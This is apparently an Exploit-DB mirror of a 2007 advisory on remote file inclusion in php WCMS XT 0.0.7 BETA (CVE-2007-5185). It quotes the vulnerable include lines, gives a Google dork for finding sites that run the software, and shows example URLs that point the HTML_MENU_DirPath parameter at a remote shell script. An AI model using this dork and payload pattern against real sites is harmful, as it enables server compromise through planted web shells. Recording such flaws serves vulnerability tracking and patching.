- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4477
- Проверка EDB
-
- Пройдено
- Автор
- KEZZAP66345
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5185
- Дата публикации
- 2007-10-01
Код:
?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
_ __________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_____ ____????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
# php WCMS XT 0_0_7 BETA <= Remote File Inclusion Vulnerability
#
#Dork:http://www.google.com.tr/search?hl=tr&q=Copyright+%C2%A9+2007+by+Horst-D.+Kr%C3%B6ller+%C2%B7+CMS%3A+php+WCMS+&meta=
#
#Vuln Code
##############################################################################################
#
#ERROR1:phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php
#
// Neccessary Classes
require_once $HTML_MENU_DirPath.'HTML/Menu.php';
require_once $HTML_MENU_DirPath.'HTML/Menu/DirectRenderer.php';
require_once $HTML_MENU_DirPath.'HTML/Menu/DirectTreeRenderer.php'; <<< RFI
#
#
#BUG1:phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath
#
#Example1:http://site.com/path/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=[[Sh3LLScript]]
#
##############################################################################################
#Vuln Code
##############################################################################################
#
#ERROR2:phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php
#
require_once $HTML_MENU_DirPath.'HTML/Menu.php';
require_once $HTML_MENU_DirPath.'HTML/Menu/DirectTreeRenderer.php'; <<< RFI
#
#
#BUG2:phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath
#
#Example2:http://site.com/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=[[Sh3LLScript]]
#
##############################################################################################
#download:
#
#http://sourceforge.net/project/showfiles.php?group_id=160753&package_id=191865&release_id=419910
#
##############################################################################################
#
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> coded by K3ZZAP66345<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
#
#"HAYIRLI RAMAZANLAR... ;)"
#
#
#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################
##############################################################################################
# milw0rm.com [2007-10-01]
- Источник
- www.exploit-db.com